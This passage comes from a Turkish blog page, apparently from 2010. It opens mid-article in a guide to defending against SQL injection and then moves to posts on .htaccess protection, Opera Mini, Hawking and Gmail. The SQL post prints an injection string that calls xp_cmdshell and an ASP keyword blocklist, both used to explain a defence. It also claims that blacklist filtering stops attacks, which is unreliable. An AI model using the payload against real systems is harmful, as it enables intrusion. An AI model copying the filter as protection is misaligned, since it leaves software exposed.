SQL Enjeksiyon saldırıları genelde ";, --,SELECT, INSERT ve xp_" gibi karakterlerin-kelimelerin kullanılmasıyla yapıldığı için gönderilecek girdinin önce bir filtreleme fonksiyonundan geçirilmesi muhtemel zayıflığı engelleyebilir.Örneğin kullanıcıdan E - Mail adresini girmesi isteniyorsa harfler ve sayıların yanında sadece " @,-,_,." karakterlerinin kullanılmasına izin verilmelidir.
Ve sunucuda saklanan xp_cmdshell ve xp_grantlogin gibi genel prosedürler,C/C++ tabanlı DLL ler, kullanıcı taraflı fonksiyonlar...vb, izole edilmiş bir sunucuya taşınmalıdır. Bazı zararlı kelime-harfleri filteleyen ASP fonksiyonu aşağıda örneklenmiştir;
<%
Function FilterBadWords(strWords)
dim BadWords
dim NewWords
BadWords = array("SELECT", "DROP", ";", "--", "INSERT", "DELETE", "xp_"’)
NewWords = strWords
for i = 0 to uBound(BadWords)
NewWords = Replace(NewWords, BadWords(i), ""’)
Next
FilterBadWords = NewWords
End Function
%>
Tırnak değiştirme fonksiyonu ve filtreleme fonksiyonu beraber kullanılırsa;
SELECT Username FROM Users WHERE Usename=’’; EXEC master..xp_cmdshell ’dir c’; --’ AND Password=’’
Şeklindeki SQL Deyimi...
SELECT Username FROM Users WHERE Usename=’" EXEC master.. cmdshell "dir c:" ’ AND Password=’’
e dönüşecektir ki bu da herhangi bir kayıt bulumadığı hatasını vermekten öteye gitmeyecektir.
Bu fonksiyonu kullanıcıdan gelen bütün girdilere, adres satırı ifadelerine ve çerezlerden gelen tüm veriye uygulamamız gelebilecek saldırının önüne geçecektir.
3.4. Girdi Uzunluğunun Sınırlandırılması
Veritabanındaki ayrılan alanın uzunluğu 10 karakterlikse, formunuzda bu alan için 50 karakter sığan bir text kutusuna sahip olmanız sakıncalı olabilir. Ve mümkün olduğu kadar girdi uzunluklarını kısa tutmak muhtemel saldırıyı engellemek için önlem sayılabilir.
3.5. Girdi Cinsinin Kontrol Edilmesi
Formunuzdan girilen verinin istediğiniz türden bir veri olup olmadığını kontrol eden bir fonksiyon kötü amaçlı kullanımlarda saldırganın kullanabileceği harf/sayı seçeneğini kısıtlayacaktır. Mesela, eğer Ürün ID si için formunuzdan girdi alıyorsanız girdinin sayısal bir ifade olup olmadığını kontrol eden bir fonksiyon fayda sağlayacaktır.
3.6. Girdi Cinsinin Kontrol Edilmesi
Formunuz aracılığı ile topladığınız verileri yollarken mutlaka "POST" metodunu kullanın ki kullanıcılarınız adres çubuğunda girdikleri verilerle beraber form değerlerini gördüklerinde akıllarına farklı fikirler gelmesin.
4. Son Söz - "Herzaman bir adım önde!"
Aldığınız güvenlik önlemleri veya (en iyi ihtimalle) yazıp da kullanmayı bir alışkanlık haline getiremediğiniz güvenlik politikaları sizi güvenlik problemlerine karşı koruyabilir mi? Eğer güvenlik ile ilgili problemleri yönetmeyi süreç temelli bir güvenlik bilinci içerisinde ele almıyorsanız hiçbir güvenlik ürünü, bir güvenlik kaybına uğramanızı engelleyemez.
Bilgi sistemleri altyapınızı taşıdıkları güvenlik zaaflarına karşı düzenli olarak kontrol ettirmek, risklerinizi takip etmek, doğru teknolojiyi doğru yerde ve doğru şekilde kullanmanızı sağlayacak güvenlik politikalarınızı oluşturup güvenlik probleminizi sürekli yönetebilecek olgunluğa ulaşmak hedeflenmelidir. Bilgi sistemlerinin önemli bir kısmını oluşturan uygulamaların taşıyabileceği güvenlik sorunları uzun süredir ihmal edilmelerinden dolayı, günümüzün en popüler sistem sızma noktalarını teşkil etmektedirler. Bu nedenle uygulama güvenliğine ilişkin gereken önemi vermeniz, güvenlik denetimi yaptırmanız ve kurumunuzun bilgi güvenliği yönetim sistemini oluşturmaya bir yerinden başlamanızı öneriyoruz.
Bakış sayısı: 112
Etiketler: sql injektion,sql bypass,sql hack,sql hacking
.Htaccess ile dizin koruma
Bilinçlendirme Çalışmalarımıza Ara Verdigimiz Yerden Devam Buyrun ;
Apache ile dizini password protected yapmak bir kaç yolla başarılabilir. bu serimizde sizlere .htaccess dosyası ile dizin ve dizin içeriklerini nasıl kullanıcı adı ve şifre ytöntemi ile koruyabilecegimizi anlatmaya çalısacagım.
Dizini koruma altına almadan önce korumak istediginiz dizini alltına .htaccess dosyasını yaratmanız gerekir. Bu dosya Web İşleticisi (httpd) tarafından dizine access vermeden önce okunur ve ona göre contentler istemciye sunulur. Bu sistemle istediginiz dizinin altına .htaccess dosyasını bırakıp dizine ait birçok işlemler yapabilirsiniz bunlardan biriside dizini kullanıcı adı ve şifre yöntemi ile dizin contentlerini koruamaktır.
Bu işlemi gerçeklestirmeden önce birkac .htaccess dosyasına birkac parametre atmak zorundasınız. Bu parametreler apache (httpd) sunucuya dizini koruyabilmesi için kullanması gereken bilgileri sunacaktır.
.htaccess dosyası
Dikkat edeceginiz bir unsur şifre dosyasını web sunucu tarafından ulaşılabilinecek bir yerde bulundurmamanızdır. Bu dosyayı dilediginiz yere bırakabilirsiniz ama FTP veya SSH yöntemiyle ulaşabileceginiz bir dizinin altına bırakmalısınız .
Bu dosyada Kullnaıcı isimleri ve encrypt edilmiş Kullanıcı şifeleri bulunmaktadır.
Eger bu dizine herhangi bir user'ın ulaşabilmesini istiyorsanız (Sistemde Bulunan herhangi bir Unix User'ı).
Egerki belirli bir kullanıcay ait olmasını istiyorsanız.
Gelelim .htpasswd dosyasına. Şimdiye kadar apacheye bu dizinin kullanışının şifreli oldugunu, Kullanıcıya göostermek istedigimiz mesajı hangi kullanıcıların erişebilecegini ve şifre dosyasını nerde bulabilecegini soyledik fakat bir sonraki basamak kimlerin bu dizine girebilecegini söyledik.
.htpasswd dosyası irkac satırdan oluşup her satırda kullancının ismi ve ":" iki nokta ile ayrılmıs şifresi bulunur.
htpasswd executable dosyasını kullanarak bu şifreleri yaratabilir veya htpasswd executable'a hangi dosyaya kaydedebilecegini söyleyebilirsiniz.
Bakış sayısı: 131
Etiketler: dizin okuma,dizin geç
Mobil Opera’yı Bilgisayarınızda Deneyin
ünyanın en çok tercih edilen mobil web tarayıcısını bilgisayarınızda test etmek istiyorsanız yapmanız gerekenleri bu yazıda bulacaksınız.
Opera Mini 5 adıyla yayınladığı Java tabanlı web tarayıcısı ile adeta mobil web tarayıcı pazarını ezici bir üstünlükle domine eden Opera, hatırlanacağı üzere son hamlesi olan iPhone ile de çok konuşulmuştu. (Opera Mini iPhone'da) iPhone kullanıcılarının yoğun ilgi gösterdiği tarayıcı, hemen her cihazda çalışabilmesi sayesinde de her geçen gün etki alanını biraz daha genişletiyor.
Mobil Opera’yı Bilgisayarınızda Deneyin 23 Nisan 2010 00:06
Dünyanın en çok tercih edilen mobil web tarayıcısını bilgisayarınızda test etmek istiyorsanız yapmanız gerekenleri bu yazıda bulacaksınız.
Opera Mini 5 adıyla yayınladığı Java tabanlı web tarayıcısı ile adeta mobil web tarayıcı pazarını ezici bir üstünlükle domine eden Opera, hatırlanacağı üzere son hamlesi olan iPhone ile de çok konuşulmuştu. (Opera Mini iPhone'da) iPhone kullanıcılarının yoğun ilgi gösterdiği tarayıcı, hemen her cihazda çalışabilmesi sayesinde de her geçen gün etki alanını biraz daha genişletiyor.
Bu başarılı web tarayıcıyı cep telefonunuzda deneme imkanı bulamadıysanız yahut telefonunuzda herhangi bir nedenden ötürü çeşitli hatalar ile karşılaştıysanız Opera Mini'yi bilgisayarınızda da deneyebilmeniz mümkün. Mac, Linux ve Windows için hazırlanmış üç farklı emulatörü kullanıcılara duyuran Opera, bu yazılımların içersine Opera Widgetburada yer alan Opera Developer Tools desteğini de eklemeyi ihmal etmemiş. Ana Opera motorunu içeren emulatöre sayfasından ulaşabilirsiniz.
Kaynak : Shifdelete
Bakış sayısı: 157
Etiketler: opera tarayıcısı,operada yenilik
Uzaylılar Pek Dost Olmayabilir
Dünyanın en zeki insanlarından biri olan ünlü fizikçi Stephen Hawkin, yeni başlayan televizyon programında insanların bakış açısını değiştirecek bazı açıklamalarda bulundu. İşte uzaylı gerçeği...
Fizik dünyasının ünlü ismi Stephen Hawking, belgesel kanalı Discovery Channel'da yeni bir programa başladı. Geçtiğimiz günlerde yayınlanan ilk bölümde ise Hawking, bilim adamlarının iddialarının tam aksi bir açıklamada bulundu. Uzaylıların varlığını reddeden bilim adamlarına karşıt görüşte olan fiziğin ünlü ismi, evrenin durumu düşünülünce insanların tek akıllı varlık olmayacağını söyledi.
Hawking, evrenimizde bulunan binlerce yıldız sistemine bakılınca burada insanlardan daha gelişmiş varlıklar olacağını iddia etti. Ancak 68 yaşındaki, fizikçiye göre uzaylılar aslında düşünüldüğünün aksine dostane varlıklar olmayabilir.
Kaynaklarımızı tüketmek için gelecekler
Modern bilimin uzaylılarla iletişime geçmesinin çok tehlikeli bir davranış olduğunu söyleyen Hawking, bu projelerin insanlara zarar verebileceğini söyledi.
Kendi gezegenlerindeki, kaynaklarını tüketmiş ırkların, dünyayı keşfettiği zaman saldırgan bir tavır sergileyebilecekleri Hawking'in düşüncelerinden biri. Amerika'nın keşfini ve dünyamızdaki tarihi olayları değerlendiren ünlü fizikçi, aynı işgalin uzaylılar tarafından gerçekleştirebileceğini düşündüğünü belirtti.
Hawking'e göre, eğer kaynaklarını tüketmiş olan varlıklar dünyamıza gelirse, Amerika'nın keşfi sırasında yaşanan soykırımın insanlık içinde geçerli olabilir. Özetle, gelişmiş ülkelerin başlattığı sömürgüleşme hareketleri dünyalar arasında yaşanabilir.
Uzaylılara inanan insanların ve derneklerin iddia ettiği, bize karşılıksız teknoloji ve dostluk sunacak olan dünya dışı varlıklar fikri, Hawking'e göre hiç gerçekçi değil.
Hawking'in bu iddiası önümüzdeki, günlerde bilim dünyasında yeni tartışmalar yaratacak gibi gözüküyor.
Bakış sayısı: 125
Etiketler: uzaylılar,evren,galaksi
İki farklı e-posta hesabınız tek sayfada
İki hafta önce Gmail’e girdiğimizde Multiple Inboxes’ın isimli deneysel bir özellikle karşılaşmıştık. Şimdiyse bu deneysel özellik Gmail’e kalıcı olarak eklendi. Eğer işiniz veya okulunuz için farklı bir e-posta kullanıyorsanız bu özelliği denemelisiniz. Böylelikle tek bir internet tarayıcı altında iki farklı hesabımızı ayrı olarak görebiliyoruz. Peki bunu nasıl mı yapacağız?
- Labs tab under settings üzerinden Multiple Inboxes özelliğini açın.
- Set up a filter seçeneğiyle okul veya iş adresinize giden tüm e-postaları düzenleyip, arşivleyin.
- E-posta adreslerinden birini diğer e-posta'nıza giden postaları göstermesi için ayarlayın. Bunu yapmak için de önce Multiple Inboxes’ı ardından Settings seçeneğini tıklayın. Böylelikle gerekli ayarlamaları yapabilirsiniz.
- İş arkadaşlarınızın farklı e-postalar kullandığınızı bilmesini istemeyebilirsiniz. Bunun için de "custom from adress" seçeneğini tıklamanız ve yönergeyi izlemeniz yeterli.
Kaynak:Pcworld
Bakış sayısı: 209
Etiketler: e-posta güvenligi,email spam,msn security
